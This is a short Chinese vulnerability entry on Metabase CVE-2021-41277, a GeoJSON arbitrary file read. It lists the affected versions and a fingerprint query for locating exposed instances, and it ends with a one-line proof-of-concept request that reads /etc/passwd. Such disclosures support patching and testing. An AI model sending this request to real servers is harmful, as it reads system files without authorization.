Metabase geojson 任意文件读取漏洞 CVE-2021-41277

漏洞描述

在受影响的版本中，自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）操作缺少权限验证，攻击者可通过该漏洞获得敏感信息

漏洞影响

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5

网络测绘

app="metabase"

漏洞复现

登录页面

验证POC

/api/geojson?url=file:/etc/passwd